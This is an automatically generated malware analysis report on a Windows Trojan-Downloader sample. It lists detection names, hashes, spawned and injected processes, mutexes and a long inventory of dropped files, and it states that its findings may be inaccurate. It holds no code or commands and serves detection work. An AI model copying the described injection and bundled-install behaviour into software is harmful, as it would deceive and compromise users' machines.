Trojan-Downloader.Win32.Genome.svyz (Kaspersky), Trojan.GenericKD.2517745 (B) (Emsisoft), Trojan.GenericKD.2517745 (AdAware), Trojan.NSIS.StartPage.FD, Trojan.Win32.Swrort.3.FD, mzpefinder_pcap_file.YR (Lavasoft MAS)Behaviour: Trojan-Downloader, Trojan
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
Summary
MD5: e495f071ab1b0a4a2577a7f7500b0849
SHA1: ca80e2e61734dc4bcc358650b1ad617d22f137f3
SHA256: 1b57f16dc8494ccda7ac3d0be5311cb82e0f391e5e90e8083cad92202edf0237
SSDeep: 6144:zeTeM/Tm97ccRErXepd8ILan5eFERXQLdtTBFDGusCtlbr1tfJ637grVG0mJNp5c:HM2Z2rXepd5oRkdJuKbfc3g8PNE
Size: 439589 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: Bandoo Media Inc
Created at: 2009-06-19 00:33:23
Analyzed on: WindowsXP SP3 32-bit
Summary: Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).
Dynamic Analysis
Payload
No specific payload has been found.
Process activity
The Trojan creates the following process(es):
popwndexe.exe:592
install1403380.exe:1196
RsMgrSvc.exe:468
ravmond.exe:1328
ravmond.exe:1848
SinaInstall_567015.exe:604
SinaInstall_567015.exe:1296
The Trojan injects its code into the following process(es):
ntvdm.exe:680
MM-liao8327.exe:1372
%original file name%.exe:1312
Mutexes
The following mutexes were created/opened:
ZonesLockedCacheCounterMutexZonesCounterMutexZonesCacheCounterMutexWininetProxyRegistryMutexWininetConnectionMutexWininetStartupMutexc:!documents and settings!adm!local settings!history!history.ie5!c:!documents and settings!adm!cookies!c:!documents and settings!adm!local settings!temporary internet files!content.ie5!_!MSFTHISTORY!_ShimCacheMutexRasPbFileaz2015624145ytda
File activity
The process ntvdm.exe:680 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
C:\DOCUMENTS AND SETTINGS (4 bytes)
%WinDir%\Temp\Perflib_Perfdata_7b8.dat (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\796953180\skinconfig\ĬÈÃÂÂ\ui\InStaller (4 bytes)
C:\ (100 bytes)
%System%\wbem\Logs (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\796953180\skinconfig\ĬÈÃÂÂ\ui\InStaller\jindutiao.png (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\796953180\skinconfig\ĬÈÃÂÂ\ui\InStaller\btn_03.png (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\796953180\skinconfig\ĬÈÃÂÂ\ui\InStaller\delete.png (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\index.dat (400 bytes)
%WinDir%\Temp\scs3.tmp (33880 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\796953180\skinconfig (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\796953180\skinconfig\ĬÈÃÂÂ\ui\InStaller\check1.png (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\796953180\skinconfig\ĬÈÃÂÂ\ui\InStaller\bg_03.png (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\796953180\skinconfig\ĬÈÃÂÂ\ui\InStaller\bg_01.png (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\796953180\skinconfig\ĬÈÃÂÂ\ui\InStaller\input_01.png (4 bytes)
%WinDir%\REGISTRATION (4 bytes)
%WinDir% (972 bytes)
C:\$Directory (1304 bytes)
%System% (7592 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\796953180\skinconfig\ĬÈÃÂÂ\ui\InStaller\change.png (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\796953180\skinconfig\ĬÈÃÂÂ\ui\InStaller\btn_change02.png (4 bytes)
%System%\config (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\796953180\skinconfig\ĬÈÃÂÂ\ui\InStaller\finish.png (12 bytes)
%System%\wbem (1064 bytes)
%System%\drivers (32 bytes)
%WinDir%\Temp\scs4.tmp (10145 bytes)
%Documents and Settings%\%current user% (4 bytes)
%Documents and Settings%\%current user%\Cookies (192 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\796953180\skinconfig\ĬÈÃÂÂ\ui\InStaller\check-box.png (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\796953180\skinconfig\ĬÈÃÂÂ\ui\InStaller\jieya_button.png (12 bytes)
%Documents and Settings%\%current user%\LOCAL SETTINGS (4 bytes)
The Trojan deletes the following file(s):
%WinDir%\Temp\scs4.tmp (0 bytes)
%WinDir%\Temp\scs3.tmp (0 bytes)
The process MM-liao8327.exe:1372 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\TN7V2XRD\Opendownloadernewxml[1].htm (900 bytes)
The process install1403380.exe:1196 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ui\snin.htm (527 bytes)
%Program Files%\Rising\RSD\RsMgrsvc.ini (60 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rscomm\moncom08.dll (1385 bytes)
%Program Files%\Rising\RAV\repairmanager.dll (38 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\label.dat (140 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\CfgDll.dll (701 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSDK\comx3.dll (673 bytes)
%Program Files%\Rising\RAV\moncomm.dll (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravmaindui\rsmain.dll (278 bytes)
%Program Files%\Rising\RAV\setup.dat (601 bytes)
%Documents and Settings%\All Users\Application Data\Rising\Rav\ShortCut\Repair.url (155 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\os.xml (685 bytes)
%Program Files%\Rising\RSD\Backup\RSD\RSSetup\Setup.exe (5441 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVMON\RAVMON.xml (574 bytes)
%Program Files%\Rising\RSD\Backup\RSD\RSSetup\popwndexe.exe (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rscfg\rscfg.xml (996 bytes)
%Program Files%\Rising\RSD\RSD950\CHT.lag (28 bytes)
%Program Files%\Rising\RAV\12345678.000 (24 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\cloudv3\cloudnotifier.dll (2752 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSDK\dfw.dll (1281 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\hookbase\rsutils.sys (1660 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravbase\LogDc.bmp (24 bytes)
%Program Files%\Rising\RSD\Backup\RAV\HOOKBASE\rsndisp.sys (10 bytes)
%Program Files%\Rising\RAV\rav936\lics936.txt (8 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSMONDEF\bacore.dll (2321 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSDK\rscom.dll (673 bytes)
%Program Files%\Rising\RSD\Backup\RSD\RSSetup\comx3.dll (673 bytes)
%Program Files%\Rising\RSD\Backup\RSD\RSSetup\CfgDll.dll (1425 bytes)
%Program Files%\Rising\RAV\rscurl.dll (1425 bytes)
%Program Files%\Rising\RSD\Backup\RAV\HOOKBASE\sysmon_if.dll (64 bytes)
%Program Files%\Rising\RSD\rsmginfo.dll (2105 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\mscrt9\Microsoft.VC90.CRT.manifest (496 bytes)
%Program Files%\Rising\RAV\msvcr90.dll (4185 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\localopt.dll (605 bytes)
%Program Files%\Rising\RSD\Backup\RAV\MONBASEDUI\rscombas.dll (1281 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVBASE\url.ini (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravxp\ravxp.xml (404 bytes)
%Program Files%\Rising\RAV\cfgxml\adefmon.mond (2 bytes)
%Program Files%\Rising\RAV\desktop.ini (182 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\cloudqry\cloudqry.dll (3179 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAV936\chs.lag (7 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\mscrt9 (4 bytes)
%Program Files%\Rising\RAV\cloudqry.dll (2105 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\hookbase\sysmon.sys (1604 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSMONDEF\antipromotionmon.dll (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rscomm\rscomm.xml (2 bytes)
%Program Files%\Rising\RSD\updater.exe (3361 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVMON\mondcoms.xml (8 bytes)
%Program Files%\Rising\RAV\Label.dat (140 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSMONDEF\bawhite.dat (22 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSDK\rsxml3w.dll (673 bytes)
%Program Files%\Rising\RSD\Backup\RAV\CLOUDQRY\rscurl.dll (1425 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsPcVer12.xml.rs (667 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSDK\RSDK.xml (1 bytes)
%Program Files%\Rising\RSD\Backup\RSD\RSSetup\RSD1252\Eng.lag (52 bytes)
%Program Files%\Rising\RSD\RsStub.exe (64 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravbase\rspalvd.dll (336 bytes)
%Program Files%\Rising\RSD\rsdinfo.dll (601 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSCOMM\Proccom.dll (1281 bytes)
%Program Files%\Rising\RSD\Backup\RAV\CLOUDV3\Cloudv3.dll (3073 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSDK\procenv.dll (29 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravmon\mond.xml (2 bytes)
%Program Files%\Rising\RSD\Backup\RAV\MONBASEDUI\moncomm.dll (673 bytes)
%Program Files%\Rising\RAV\RsTray.ico (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravbase\LogAc.bmp (24 bytes)
%Program Files%\Rising\RAV\RsSmall.bmp (576 bytes)
%Program Files%\Rising\RSD\Backup\RSD\RSSetup\RsAppMgr.dll (64 bytes)
%Program Files%\Rising\RAV\uprsuser.dat (10 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\cloudv3\cloudwork.dll (11830 bytes)
%Program Files%\Rising\RAV\cfgxml\mondcoms.xml (8 bytes)
%Program Files%\Rising\RSD\Backup\RAV\CLOUDV3\cloudstore.dll (2321 bytes)
%Program Files%\Rising\RAV\cfgxml\mond.xml (2 bytes)
%Program Files%\Rising\RSD\Backup\RAV\HOOKBASE\mondrv.dll (3073 bytes)
%Documents and Settings%\All Users\Application Data\Rising\Rav\rsuser.db1 (601 bytes)
%Program Files%\Rising\RAV\XMLS\RSDK.xml (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravdefdb\rsuser.db1 (71 bytes)
%Program Files%\Rising\RAV\Microsoft.VC90.CRT.manifest (496 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravbase\RsMain.ico (27 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\monbasedui\rssrv.dll (114 bytes)
%Program Files%\Rising\RAV\cnt08.dll (673 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVMAINDUI\RAVMAINDUI.xml (1 bytes)
%Program Files%\Rising\RSD\RSD936\CHS.lag (28 bytes)
%System%\drivers\rsutils.sys (601 bytes)
%Program Files%\Rising\RSD\Backup\RSD\RSSetup\RsBackup.exe (2105 bytes)
%Program Files%\Rising\RSD\Backup\RAV\MSCRT9\msvcr90.dll (4185 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\monbasedui\rscombas.dll (435 bytes)
%Program Files%\Rising\RSD\Backup\RAV\CLOUDV3\userdata.rstray (293 bytes)
%Program Files%\Rising\RSD\Backup\RAV\LICENSE\LICENSE.xml (347 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\RSD1252\Eng.lag (52 bytes)
%Program Files%\Rising\RSD\Backup\RAV\CLOUDQRY\cloudnet.dll (673 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVMON\mond.xml (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\popwndexe.exe (126 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rsdk\rsxml3a.dll (1898 bytes)
%Program Files%\Rising\RSD\Backup\RAV\MONBASEDUI\MONBASEDUI.xml (1 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVCONFIG\mergexml.dll (601 bytes)
%Program Files%\Rising\RSD\Backup\RAV\HOOKBASE\kguard_if.dll (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rsdk\comx3.dll (709 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\cloudv3\localopt.dll (2613 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rsdk\rsdk.xml (1 bytes)
%Program Files%\Rising\RSD\Backup\RSD\RSSetup\RstoreDll.dll (1281 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravmon\mondcoms.xml (8 bytes)
%Program Files%\Rising\RAV\RavSetup.dll (7433 bytes)
%Program Files%\Rising\RAV\cfgxml\repairmanager.mond (207 bytes)
%Program Files%\Rising\RAV\CompsVer.inf (2 bytes)
%Program Files%\Rising\RSD\Backup\RAV\HOOKBASE\kguard.sys (601 bytes)
%Program Files%\Rising\RAV\RsMain.ico (27 bytes)
%Program Files%\Rising\RSD\Backup\RSD\RSSetup\rsmginfo.dll (2105 bytes)
%Program Files%\Rising\RAV\XMLS\MONBASEDUI.xml (1 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVDEFDB\uprsmon.dat (45 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVBASE\rstask.xml (4 bytes)
%Program Files%\Rising\RAV\procenv.dll (29 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravdefdb\rsmon.db1 (43 bytes)
%Program Files%\Rising\RSD\RsMgrSvc.exe (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\RSD932\Jpn.lag (37 bytes)
%Program Files%\Rising\RAV\mergexml.dll (601 bytes)
%Program Files%\Rising\RAV\rsutils_if.dll (58 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSCFG\rscfg.dll (53 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\RsMgrSvc.exe (1855 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\monbasedui\monbasedui.xml (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\RstoreDll.dll (2352 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravbase\url.ini (4 bytes)
%Program Files%\Rising\RAV\Rising.ico (3 bytes)
%Program Files%\Rising\RAV\url.ini (4 bytes)
%Program Files%\Rising\RSD\Backup\RAV\HOOKBASE\hookbase.dll (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravconfig\ravconfig.xml (518 bytes)
%Program Files%\Rising\RAV\rssrv.dll (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\mscrt9\Microsoft.VC90.ATL.manifest (466 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\CompsVer.inf (2 bytes)
%Program Files%\Rising\RAV\XMLS\RAVDEFDB.xml (967 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVBASE\LogAc.bmp (24 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\TN7V2XRD\urg[1].htm (168 bytes)
%Program Files%\Rising\RSD\rslang.dll (673 bytes)
%Program Files%\Rising\RSD\Backup\RSD\RSSetup\rslang.dll (673 bytes)
%Program Files%\Rising\RAV\cfgxml\repairmanager.mondcoms (232 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\mscrt9\mscrt9.xml (961 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rav936\chs.lag (7 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVXP\ravxp.exe (601 bytes)
%Program Files%\Rising\RAV\Cloudv3.dll (3073 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rsmondef\bawhite.dat (22 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravconfig\mergexml.dll (117 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravlog\rslog.dll (106 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rslang.dll (935 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVBASE\rspalvd.dll (1281 bytes)
%Program Files%\Rising\RSD\os.xml (685 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RAV.cfg (48 bytes)
%Program Files%\Rising\RAV\LogDc.bmp (24 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSCOMM\moncom08.dll (601 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVBASE\repairmanager.mondcoms (232 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rscomm\rssqlite.dll (2550 bytes)
%Documents and Settings%\All Users\Application Data\Rising\Rav\rsmon.db (43 bytes)
%Program Files%\Rising\RAV\rscommx2.dll (1281 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\mscrt9\atl90.dll (1254 bytes)
%Program Files%\Rising\RAV\cloudsta.dll (63 bytes)
%Program Files%\Rising\RSD\Backup\RAV\HOOKBASE\rsutils_if.dll (58 bytes)
%Program Files%\Rising\RSD\Backup\RSD\RSSetup\setup.dat (601 bytes)
%System%\drivers\protreg.sys (24 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravbase\repairmanager.mond (207 bytes)
%Program Files%\Rising\RSD\Backup\RSD\RSSetup\RSSetup.xml (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\syslay.dll (1248 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\updater.exe (7115 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravmaindui\ravmaindui.xml (1 bytes)
%Program Files%\Rising\RSD\Backup\RAV\MSCRT9\msvcp90.dll (3361 bytes)
%Program Files%\Rising\RSD\Backup\RAV\CompsVer.inf (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravlog\ravlog.xml (545 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WSS96LYK\urg[1].htm (56 bytes)
%Program Files%\Rising\RSD\Backup\RAV\HOOKBASE\rsutils.sys (601 bytes)
%Program Files%\Rising\RAV\rscom.dll (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\protreg.sys (24 bytes)
%Program Files%\Rising\RAV\XMLS\RAVLOG.xml (545 bytes)
%Program Files%\Rising\RAV\cfgxml\userdata.rstray (293 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSCOMM\Proccomm.dll (673 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSMONDEF\defmon.dll (3361 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVBASE\pngdll.dll (1425 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rscomm\syslay.dll (26 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravbase\RavSetup.dll (4295 bytes)
%Program Files%\Rising\RSD\Backup\RSD\RSSetup\rsdk.dll (3073 bytes)
%Program Files%\Rising\RSD\Backup\RAV\CLOUDV3\userdata.mond (485 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSDK\rsxml3a.dll (673 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVBASE\setup.dat (601 bytes)
%Program Files%\Rising\RAV\ravmond.exe (1425 bytes)
%Program Files%\Rising\RAV\sysmon_if.dll (64 bytes)
%Program Files%\Rising\RSD\Backup\RAV\_RAV\_RAV.xml (368 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravbase\repairmanager.mondcoms (232 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSMONDEF\x64\adefmon.mond (1 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVBASE\RsSmall.bmp (576 bytes)
%Program Files%\Rising\RSD\Backup\RAV\HOOKBASE\64\sysmon.sys (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rsdk\procenv.dll (29 bytes)
%Program Files%\Rising\RAV\XMLS\RSMONDEF.xml (1 bytes)
%Program Files%\Rising\RAV\rsnscfg.dat (2 bytes)
%Program Files%\Rising\RSD\Backup\RAV\HOOKBASE\64\rsndisp.sys (11 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSCFG\RSCFG.xml (996 bytes)
%Program Files%\Rising\RAV\moncom08.dll (601 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSCOMM\RSCOMM.xml (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\cloudqry\cloudqry.xml (1 bytes)
%Program Files%\Rising\RAV\rsmain.exe (601 bytes)
%Program Files%\Rising\RAV\rssqlite.dll (2321 bytes)
%Program Files%\Rising\RSD\Backup\RAV\CLOUDV3\cloudnotifier.dll (1425 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\hookbase\hookbase.dll (787 bytes)
%Program Files%\Rising\RSD\Backup\RSD\RSSetup\syslay.dll (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rsmondef\antipromotionmon.dll (432 bytes)
%Program Files%\Rising\RAV\XMLS\LICENSE.xml (347 bytes)
%Program Files%\Rising\RSD\Backup\RAV\Label.dat (140 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravconfig\ravcfg.xml (126 bytes)
%Program Files%\Rising\RAV\rsdll.dll.dat (601 bytes)
%Program Files%\Rising\RSD\Backup\RSD\RSSetup\ui\snin.htm (527 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVDEFDB\rsmon.db1 (43 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\hookbase\64\sysmon.sys (1076 bytes)
%Program Files%\Rising\RSD\Backup\RSD\RSSetup\RsMgrSvc.exe (673 bytes)
%Program Files%\Rising\RAV\XMLS\RAVCONFIG.xml (518 bytes)
%Program Files%\Rising\RSD\Backup\RAV\CLOUDV3\datastorage.db (19 bytes)
%Program Files%\Rising\RAV\rsxml3w.dll (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravbase\RsSmall.bmp (576 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\TN7V2XRD\RsPcVer12[1].xml (663 bytes)
%Program Files%\Rising\RAV\XMLS\MSCRT9.xml (961 bytes)
%Program Files%\Rising\RSD\Backup\RAV\CLOUDV3\dataups.dat (207 bytes)
%Program Files%\Rising\RAV\antipromotionmon.dll (673 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSCOMM\rssqlite.dll (2321 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVBASE\RAV.ico (601 bytes)
%Program Files%\Rising\RAV\rslog.dll (601 bytes)
%Program Files%\Rising\RAV\Proccom.dll (1281 bytes)
%Program Files%\Rising\RSD\Backup\RAV\CLOUDQRY\cloudqry.dll (2105 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVCONFIG\RAVCONFIG.xml (518 bytes)
%Program Files%\Rising\RSD\Backup\RAV\CLOUDQRY\cloudsta.dll (63 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVBASE\Rising.ico (3 bytes)
%Program Files%\Rising\RAV\dfw.dll (1281 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVDEFDB\uprsuser.dat (10 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rsmondef\defmon.dll (3386 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVMAINDUI\rsmain.exe (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rsmginfo.dll (3891 bytes)
%Program Files%\Rising\RAV\rspalvd.dll (1281 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\cloudv3\userdata.rstray (293 bytes)
%Program Files%\Rising\RAV\selfmon.dll (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\monbasedui\moncomm.dll (165 bytes)
%Program Files%\Rising\RAV\XMLS\RSCOMM.xml (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rscomm\rscommx2.dll (1411 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravdefdb\uprsuser.dat (10 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\hookbase\kguard.sys (634 bytes)
%Program Files%\Rising\RAV\XMLS\HOOKBASE.xml (4 bytes)
%Program Files%\Rising\RSD\Backup\RSD\RSSetup\RSD932\Jpn.lag (37 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rsdk\rsxml3w.dll (248 bytes)
%Program Files%\Rising\RAV\bacore.dll (2321 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\_rav\_rav.xml (368 bytes)
%Program Files%\Rising\RAV\XMLS\RAVMON.xml (574 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVBASE\RAVBASE.xml (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\cloudv3\userdata.mond (485 bytes)
%Program Files%\Rising\RAV\rscfg.dll (53 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravxp\ravxp.exe (86 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rsmondef\selfmon.dll (89 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\license\12345678.000 (48 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RAV.cfg.tmp (1960 bytes)
%Program Files%\Rising\RSD\syslay.dll (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\setup.dll (3859 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\cloudv3\cloudv3.xml (1 bytes)
%Program Files%\Rising\RAV\LogAc.bmp (24 bytes)
%Program Files%\Rising\RSD\ui\snin.htm (527 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSCOMM\cnt09.dll (1281 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\cloudv3\Cloudv3.dll (4727 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\comx3.dll (693 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVBASE\repairmanager.dll (38 bytes)
%Program Files%\Rising\RAV\dataups.dat (207 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\hookbase\64\rsutils.sys (985 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rsmondef\monrule.dll (1153 bytes)
%Program Files%\Rising\RAV\XMLS\RAVMAINDUI.xml (1 bytes)
%Program Files%\Rising\RAV\XMLS\CLOUDQRY.xml (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\cloudqry\rscurl.dll (3926 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\cloudqry\cloudnet.dll (2054 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\RSD936\CHS.lag (28 bytes)
%Program Files%\Rising\RSD\Backup\RSD\RSSetup\protreg.sys (24 bytes)
%Program Files%\Rising\RAV\msvcp90.dll (3361 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\Rising Software Deployment System\.lnk (2 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSMONDEF\selfmon.dll (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravbase\rstask.xml (4 bytes)
%Program Files%\Rising\RAV\monrule.dll (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\RsStub.exe (1762 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\RSSETUP.xml (6 bytes)
%Program Files%\Rising\RSD\Backup\RAV\CLOUDV3\cloudwork.dll (7726 bytes)
